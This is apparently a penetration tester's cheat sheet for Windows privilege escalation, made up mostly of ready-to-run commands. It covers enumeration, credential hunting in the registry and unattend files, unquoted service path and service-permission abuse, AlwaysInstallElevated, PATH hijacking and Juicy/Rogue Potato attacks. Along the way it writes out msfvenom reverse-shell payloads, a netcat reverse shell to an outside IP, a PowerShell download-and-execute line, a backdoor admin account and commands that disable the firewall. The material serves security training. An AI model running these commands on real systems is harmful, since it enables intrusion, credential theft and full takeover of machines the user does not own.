Manual Exploitation
Start with Common Commands
0. Check Who You Are and What You Can Do
whoami
whoami /groups
whoami /priv
net user %username%
Are you an Administrator? Do you have high-privilege tokens like
SeImpersonatePrivilege?
1. Check if You Have Administrator Access
net session
If you get
Access is denied, you’re not admin.
2. Check System Version and Patch Level
systeminfo
ver
Look for unpatched privilege escalation exploits (e.g.
MS16-032,PrintNightmare,Potatofamily).
3. Check Scheduled Tasks
schtasks /query /fo LIST /v
Look for tasks running as SYSTEM or Administrator, especially with writable paths.
4. Check Services and Their Paths
sc query state= all
wmic service get name,displayname,pathname,startmode
Search for Unquoted Service Paths or misconfigured services with writable folders.
5. Check for Writable Folders/Files
icacls "C:\Program Files" /t
Look for
F(Full Control) for non-admin users.
6. Search for Passwords in Files
findstr /si password *.txt *.xml *.ini
Check
C:\Users,AppData,ProgramData,Desktop, etc.
7. Check Installed Programs (Potentially Vulnerable)
wmic product get name,version
Look for vulnerable software like
TeamViewer,Java,WinRAR, etc.
8. Check Users and Profiles
net users
dir C:\Users
Any admin profiles? Can you read their files?
9. Token Privileges and Impersonation
whoami /priv
If you have
SeImpersonatePrivilege, you can use JuicyPotato, PrintSpoofer, etc.
10. Check Network Shares and Mapped Drives
net share
net use
Look for
C$,ADMIN$, or mapped drives with sensitive content.
11. DLL Hijacking Possibilities
- Look for services or apps that load DLLs from writable folders.
- Use Process Monitor, Procmon, Autoruns to identify DLL search paths.
12. PowerShell Environment Info
$PSVersionTable
Older versions might be less secure. Check for available modules like PowerView.
Windows Directory Structure
| Directory | Description |
|---|---|
| A:\, B:\, C:\, D:\ | Named drives assigned to physical or logical disks |
| C:\Program Files | Default location for installed 64-bit programs |
| C:\Program Files (x86) | Default location for installed 32-bit and legacy (16-bit) programs |
| C:\Users | Contains user profile folders (one per user) |
| └── Desktop, Downloads, etc. | Each user folder contains personal Desktop, Downloads, Documents, etc. |
| C:\Windows | Core Windows directory |
| └── system, system32 | Contains essential system executables (.exe) and libraries (.dll) |
| C:\Inetpub | Default directory for IIS (Internet Information Services) web server files |
Operating System
What is the OS and architecture? Is it missing any patches? (!)
systeminfo
wmic qfe
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Users
Who are you? (!)
whoami
whoami /all
# shows all information about that user
hostname
echo %USERNAME%
$env:UserName
All users
What users are on the system? Any old user profiles that weren’t cleaned up? We list the other user accounts on the box and view our own user’s information in a bit more detail.
net users
net user administrator
# Get information for particular user
dir /b /ad "C:\Users\"
dir /b /ad "C:\Documents and Settings\" # Windows XP and below
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Add User
Adding user that is part of the Administrator group
net user test test /add && net localgroup Administrators test /add
Groups
What groups are on the system?
net localgroup
Get-LocalGroup | ft Name
Autologon
Anything in the Registry for User Autologon?
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon
if we got any auto log on enabled , we can use the winexe command to spawn a shell using these credentials:
winexe -U 'admin%password123' //192.168.1.22 cmd.exe
Programs, Processes, and Services
Softwares
What software is installed?
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
Services
What are the running processes/services on the system? Is there an inside service not exposed? If so, can we open it?
tasklist /svc
tasklist /v
net start
sc query
# information about services and drivers can be obtained
sc start service_name
# To start service
sc stop service_name
# To stop running service
This one liner returns the process owner without admin rights, if something is blank under owner it’s probably running as SYSTEM, NETWORK SERVICE, or LOCAL SERVICE.
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
Scheduled Tasks
What scheduled tasks are there? Anything custom implemented?
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks
schtasks /query /fo LIST /v
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Networking
NICs
What NICs are connected? Are there multiple networks?
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Routes
What routes do we have?
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
ARP
Anything in the ARP cache?
arp -a
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
Connections
Are there connections to other hosts?
netstat -ano
Host File
C:\WINDOWS\System32\drivers\etc\hosts
Firewall
Is the firewall turned on? If so what’s configured?
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all
netsh advfirewall export "firewall.txt"
netsh firewall set opmode mode=disable
# To Disable firewall
Enable RDP
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
SNMP configurations
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
Weak Files and Folder permissions
Listing files
dir /a
# list all files (even hidden files)
dir /s
# searches folders
dir /s *password*
# search the system for files containing 'password' in the filename
findstr /si password *.txt*
# search for specific keyword in txt file
Icacls
Are there any weak folder or file permissions? Full Permissions for Everyone or Users on Program Folders?
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}
Modify Permissions for Everyone or Users on Program Folders?
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
Sensitive Information
Yes, passwords.
Even administrators re-use their passwords, or leave their passwords on systems in readable locations.
Windows can be especially vulnerable to this, as several features of Windows store passwords insecurely.
Registry
Searching registry for password
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s
.\winPEASany.exe quiet filesinfo userinfo
If we got any credentials we can use winexe to login into box
winexe -U 'admin%password123' //192.168.1.22 cmd.exe
Autologon
Anything in the Registry for User Autologon?
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon
if we got any auto log on enabled , we can use the winexe command to spawn a shell using these credentials:
winexe -U 'admin%password123' //192.168.1.22 cmd.exe
Saved Creds
Windows has a runas command which allows users to run commands with the privileges of other users.
This usually requires the knowledge of the other user’s password.
However, Windows also allows users to save their credentials to the system, and these saved credentials can be used to bypass this requirement.
cmdkey /list
.\winPEASany.exe quiet cmd windowscreds
We can use the saved credential to run any command as the admin user. Start a listener on Kali and run the reverse shell executable:
runas /savecred /user:admin C:\PrivEsc\reverse.exe
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
runas /savecred /user:Administrator "cmd.exe /k whoami"
Configuration Files
Some administrators will leave configurations files on the system with passwords in them.
The Unattend.xml file is an example of this.
It allows for the largely automated setup of Windows systems.
dir /s *pass* == *.config
# Recursively search for files in the current directory with “pass” in the name, or ending in “.config”
findstr /si password *.xml *.ini *.txt
# Recursively search for files in the current directory that contain the word “password” and also end in either .xml, .ini, or .txt
Is XAMPP, Apache, or PHP installed? Any there any XAMPP, Apache, or PHP configuration files?
dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
Get-Childitem –Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue
Once again we can simply use winexe to spawn a shell as the admin user.
Unattend and sysprep
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
IIS
If the server is an IIS webserver, what’s in inetpub? Any hidden directories? web.config files?
dir /a C:\inetpub\
dir /s web.config
C:\Windows\System32\inetsrv\config\applicationHost.config
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
What’s in the IIS Logs?
C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log
Unquoted Service Path
The Unquoted Service Paths vulnerability is a vulnerability that arises out of the way Windows interprets a file path for a service binary (executable). File paths that contain spaces, should be enclosed in double-quotes. If not, there’s a potential Unquoted Service Path vulnerability.
For example, the following path would be vulnerable:
C:\Program Files\something\winamp.exe
Not vulnerable
"C:\Program Files\something\winamp.exe"
We could place our payload with any of the following paths:
C:\winamp.exe (this is a reverse shell with the same names as legal program)
Required Things
- A service with an “unquoted” binary path containing one or more spaces in the path.
- Write permission for any of the folder containing spaces.
- A way to reboot the service or system in order to execute a payload.
Finding unquoted services
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
sc qc <service_name>
# verify with sc
Checking writable permission
icacls "C:\Program Files (x86)\Program Folder"
Creating malicious program
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[LHOST IP] LPORT=443 -f exe -o Some.exe
Managing Services
once we transferred our payload to particular directory , we can restart the service to execute it
sc stop <service_name>
sc start <service_name>
Runas / Switch User
Use Case
- After gaining a low-privileged shell on a Windows system through network/web application vulnerabilities.
- Admin credentials may be obtained using tools like
hashdump,wce.exe, orfgdump.exe. - Remote Desktop may be disabled; direct login as another user not possible.
Using runas Command
runas /user:username program
- If the password prompt appears: input the password to switch users.
- If no password prompt: use a PowerShell script instead.
PowerShell Method
ps-sudo.ps1
$pw = ConvertTo-SecureString "b33fpassword" -AsPlainText -Force
$pp = New-Object System.Management.Automation.PSCredential -ArgumentList "b33f", $pw
$script = 'C:\\Windows\\Temp\\nc.bat'
Start-Process powershell -Credential $pp -ArgumentList "-noprofile -command &{Start-Process C:\\Windows\\Temp\\nc.bat -verb Runas}"
nc.bat
C:\\Windows\\Temp\\nc.exe 10.11.1.40 443 -e cmd.exe
Executing the Script Remotely
powershell.exe iex (New-Object Net.WebClient).DownloadString('http://192.168.119.193:8000/')
AlwaysInstallElevated
AlwaysInstallElevated is a Windows setting that allows non-privileged users to install Microsoft Windows Installer Package Files (MSI) with elevated system permissions. This means that we can use this feature to execute a malicious MSI installer package with administrator permissions. To achieve this, two registry entries have to be set to the value 1 to be enabled.
Check the value of these registry keys
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
$ Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer
$ Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer
Generating Payload
msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=[LHOST IP] LPORT=443 -f msi -o filename.msi
Executing msi file
msiexec /quiet /qn /i C:\Users\filename.msi
Unattended Installs
Unattended Installs allow Windows to be deployed with little or no active involvement from an administrator. If administrators fail to clean up after such a process, an EXtensible Markup Language (XML) file called Unattend is left on the local system. This file contains all the configuration settings that were set during the installation process, some of which can involve the configuration of local accounts including Administrator accounts!
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
# Display the content of these files
Unattend credentials are stored in base64 and can be decoded manually with base64.
$PATH Interception
Requirements:
- PATH contains a writeable folder with low privileges.
- The writeable folder is before the folder that contains the legitimate binary.
List contents of the PATH environment variables
$env:Path
# EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32
Checking writable permission
icacls.exe "C:\Program Files\nodejs\"
Placing malicious binary
copy evil-file.exe "C:\Program Files\nodejs\cmd.exe"
Kernel Exploitation
Finding kernel exploit
Finding and using kernel exploits is usually a simple process:
- Enumerate Windows version / patch level (systeminfo).
- Find matching exploits (Google, ExploitDB, GitHub).
- Compile and run.
Known Exploits
List of exploits kernel : https://github.com/SecWiki/windows-kernel-exploits
Commonly Windows Exploit Reference Table
| Security Bulletin | KB | Description | Operating System |
|---|---|---|---|
| MS17-017 | KB4013081 | GDI Palette Objects Local Privilege Escalation | Windows 7/8 |
| CVE-2017-8464 | - | LNK Remote Code Execution Vulnerability | Windows 10/8.1/7/2016/2010/2008 |
| CVE-2017-0213 | - | Windows COM Elevation of Privilege Vulnerability | Windows 10/8.1/7/2016/2010/2008 |
| CVE-2018-0833 | - | SMBv3 Null Pointer Dereference DoS | Windows 8.1/Server 2012 R2 |
| CVE-2018-8120 | - | Win32k Elevation of Privilege Vulnerability | Windows 7 SP1/2008 SP2/2008 R2 SP1 |
| MS17-010 | KB4013389 | Windows Kernel Mode Drivers | Windows 7/2008/2003/XP |
| MS16-135 | KB3199135 | Windows Kernel Mode Drivers | Windows Server 2016 |
| MS16-111 | KB3186973 | Kernel API | Windows 10 10586 (32/64)/8.1 |
| MS16-098 | KB3178466 | Kernel Driver | Windows 8.1 |
| MS16-075 | KB3164038 | Hot Potato | 2003/2008/7/8/2012 |
| MS16-034 | KB3143145 | Kernel Driver | 2008/7/8/10/2012 |
| MS16-032 | KB3143141 | Secondary Logon Handle | 2008/7/8/10/2012 |
| MS16-016 | KB3136041 | WebDAV | 2008/Vista/7 |
| MS16-014 | K3134228 | Remote Code Execution | 2008/Vista/7 |
| MS03-026 | KB823980 | Buffer Overrun In RPC Interface | NT/2000/XP/2003 |
Important Tools
Windows Exploit Suggester: https://github.com/bitsadmin/wesng
Precompiled Kernel Exploits: https://github.com/SecWiki/windows-kernel-exploits
Watson: https://github.com/rasta-mouse/Watson
Hot Potatoes
Service Accounts -
Service accounts can be given special privileges in order for them to run their services, and cannot be logged into directly.
Unfortunately, multiple problems have been found with service accounts, making them easier to escalate privileges with.
C:\Windows\Temp>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\Windows\Temp>
“SeImpersonatePrivilege” is enabled so we can impersonate other users
If the machine is >= Windows 10 1809 & Windows Server 2019 - Try Rogue Potato If the machine is < Windows 10 1809 < Windows Server 2019 - Try Juicy Potato
Juicy Potato
https://github.com/ohpe/juicy-potato
Vulnerable Win versions
Windows 7 Enterprise
Windows 8.1 Enterprise
Windows 10 Enterprise
Windows 10 Professional
Windows Server 2008 R2 Enterprise
Windows Server 2012 Datacenter
Windows Server 2016 Standard
1. Create paylaod
msfvenom -p cmd/windows/reverse_powershell lhost=10.10.12.15 lport=4444 > shell.bat
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.3 LPORT=1337 -f exe > shell.exe
# If above payload failed to give stable connection
-
Transfer shell.bat and jp.exe to target box
-
Run JuicyPotato
./jp.exe -t * -p shell.bat -l 4444
-t: Create process call. For this option we’ll use * to test both options.
-p: The program to run. We’ll need to create a file that sends a reverse shell back to our attack machine.
-l: COM server listen port. This can be anything. We’ll use 4444.
Along with community string if default is failed
CLSID List -
./jp.exe -t * -p shell.bat -l 4444 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Rogue Potato
https://github.com/antonioCoco/RoguePotato
# Network redirector / port forwarder to run on your remote machine, must use port 135 as src port
socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999
# RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine.
# Use this if you have fw restrictions.
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"
# RoguePotato all in one with RogueOxidResolver running locally on port 9999
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999
#RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode
Insecure Service PermissionsEach service has an ACL which defines certain service-specific permissions.
Some permissions are innocuous (e.g. SERVICE_QUERY_CONFIG, SERVICE_QUERY_STATUS).
Some may be useful (e.g. SERVICE_STOP, SERVICE_START).
Some are dangerous (e.g. SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS)
If our user has permission to change the configuration of a service which runs with SYSTEM privileges, we can change the executable the service uses to one of our own.
Potential Rabit Hole: If you can change a service configuration but cannot stop/start the service, you may not be able to escalate privileges!
Identifying Service
.\accesschk.exe /accepteula -uwcqv user daclsvc
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @sc sdshow %i & @echo ---------) & del a 2>nul & del b 2>nul
# Obtain the permission string of all services
The following commands will print the affected services:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
Check the current configuration and status of the service
sc qc <service>
sc query <service>
Putting our malicious payload
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
Starting service
start listener on your kali and start the service on target box
net start <service>
Weak Registry Permissions
The Windows registry stores entries for each service. Since registry entries can have ACLs, if the ACL is misconfigured, it may be possible to modify a service’s configuration even if we cannot modify the service directly.
Identifying weak registry
Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
Overwriting registry key to add reverse shell
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
Starting service
start listener on your kali and start the service on target box
net start <service>